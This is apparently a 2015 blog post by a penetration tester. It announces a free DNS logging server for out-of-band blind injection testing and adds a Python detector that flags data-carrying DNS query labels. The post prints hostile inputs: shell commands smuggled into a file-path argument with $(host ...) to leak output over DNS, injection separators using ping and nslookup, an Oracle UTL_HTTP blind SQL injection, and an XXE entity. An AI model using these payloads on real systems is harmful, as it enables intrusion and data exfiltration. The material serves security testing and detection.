Monday, December 7, 2015

Out of Band Injection Testing: Free public NS Query server

For blind injection testing, and as a follow-up to my previous post, I'm launching a pilot version of my DNS server (free for now).

Open up your terminal and connect to on port 5353:

~# nc 5353

Your match string [a-z0-9]{5,} only [e.g. nicolas]: nicolas

Example query:
{"date": "06-Dec-2015", "query": "", "client": "", "time": "17:27:44.409"}

In my last web application penetration test, I was able to read the source code of a PHP application, and there was a call to the exec() function.
The problem was that I didn't get any output, and the usual time-based technique of "sleep 60" did not seem to be working.

With my NS server I've successfully exfiltrated data over DNS queries.

PHP source:
exec('/opt/someprogram "$filename" "$tmppath"')

Successful injection:
/opt/someprogram blahblah.jpg /tmp/images$(host

Getting the wget version with this technique:
/opt/someprogram blahblah.jpg /tmp/image$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.')

With this output:
{"date": "xx-xxx-2015", "query": "", "client": "xx.xx.xx.xx#63325:", "time": ""}
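On the receiving side, the same log records are what a defender can watch. As an added example (not code from the original post or its server), the following Python parses constructed log lines in the JSON shape shown above and flags query names whose labels look like smuggled data, such as the hyphen-joined wget banner; the zone oob.example.invalid, the client addresses and the records are made up.

```python
import json
import math
import re
from collections import Counter

# Constructed sample of the one-JSON-record-per-query log format shown above.
# The zone oob.example.invalid, the client addresses and the queries are made up.
SAMPLE_LOG = """\
{"date": "06-Dec-2015", "query": "nicolas.oob.example.invalid", "client": "192.0.2.10#53000:", "time": "17:27:44.409"}
{"date": "06-Dec-2015", "query": "gnu-wget-1165-a-non-interactive-network-retriever.nicolas.oob.example.invalid", "client": "192.0.2.10#63325:", "time": "17:29:01.120"}
{"date": "06-Dec-2015", "query": "www.oob.example.invalid", "client": "198.51.100.7#40000:", "time": "17:30:00.000"}
{"date": "06-Dec-2015", "query": "3ed9a1f0c8b7.nicolas.oob.example.invalid", "client": "192.0.2.10#63326:", "time": "17:30:05.500"}
"""

def shannon_entropy(s):
    """Bits per character; random-looking (encoded) labels score high."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def label_reasons(label, max_len=20):
    """Return why a single DNS label looks like smuggled data (empty if benign)."""
    reasons = []
    if len(label) > max_len:
        reasons.append("long label (%d chars)" % len(label))
    if label.count("-") >= 4:
        reasons.append("many hyphens (space/comma substitution, as in the wget -h trick)")
    if re.fullmatch(r"[0-9a-f]{8,}", label):
        reasons.append("hex-looking label")
    if len(label) >= 8 and shannon_entropy(label) > 3.5:
        reasons.append("high entropy (%.2f bits/char)" % shannon_entropy(label))
    return reasons

def find_exfil_queries(log_text):
    """Parse the JSON-lines log and return the records whose names carry data."""
    flagged = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        reasons = []
        for label in rec["query"].rstrip(".").split("."):
            reasons += label_reasons(label)
        if reasons:
            flagged.append({
                "client": rec["client"].split("#")[0],  # strip the "#port:" suffix
                "query": rec["query"],
                "reasons": reasons,
            })
    return flagged

if __name__ == "__main__":
    for hit in find_exfil_queries(SAMPLE_LOG):
        print(hit["client"], hit["query"], "; ".join(hit["reasons"]))
```

The thresholds (20-character labels, four hyphens, 3.5 bits/char) are starting points; tune them against the benign traffic of the zone being monitored.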

It may be useful for command injection, for example:
$(host $
| ping $ |
&& nslookup &&

Blind SQL injection, like this:
SELECT * FROM products WHERE id=1||UTL_HTTP.request('') --

XML external entity injection:
<!ENTITY dtd SYSTEM "">%dtd

and more.

For now, it's free but with limited support. (You may send some $$$ if you love using it :)